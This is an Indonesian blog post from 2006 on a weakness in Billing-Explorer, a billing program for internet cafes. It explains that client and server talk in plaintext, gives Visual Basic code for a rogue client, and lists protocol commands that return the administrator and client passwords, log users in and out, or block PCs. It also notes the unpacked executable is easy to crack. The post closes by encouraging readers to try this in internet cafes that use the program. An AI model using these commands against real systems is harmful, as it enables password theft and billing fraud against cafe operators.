30 April 2006

Kelemahan Pada Billing-Explorer


Penulis : Ajie

Sebelumnya saya mohon maaf atas apa yang saya tulis pada artikel ini, ini hanya bertujuan untuk menambah wawasan saja di bidang keamanan sebuah program. Jadi penulis tidak bertanggung jawab atas penyalah gunaan artikel ini.

KALO SETUJU SILAHKAN TERUSKAN BACA ARTIKELNYA, KALO NGGAK MENDINGAN TUTP AJA.

Sebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com
Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install
terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan kedua
program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008


- ok saya anggap anda semua udah bisa menjalankannya.

Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client.......Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja...ops....ternyata....he...he....

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan 'YYY' dan sebaliknya apabila dikirim dari client ke server akan diawali dengan 'XXX' (tanpa curek).

("Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.")

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HACKER$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HACKER -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline=True dengan Scrollbars=Both

Private Sub Command1_Click()
SOCK.Close
'// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect "192.168.0.1", "1500"
End Sub

Private Sub Command2_Click()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String(50, "-") & vbCrLf

End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Internet Cafe$JL. Urip Sumoharjo Makassar$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata '008' dan '111', ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya. seperti yang terlihat pada gambar dibawah ini :

anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HACKER$
(Login pada PC no 2 dengan nama user HACKER)
2. XXX$stop$2$HACKER
(untuk logout dari billing)
3. XXX$con$2$HACKER
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti 'EtherDetect Packet Sniffer'.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm...sekalian bisa dicoba...nih...

Posted by R4ngg4 on Sunday, April 30, 2006

=============================================================================================================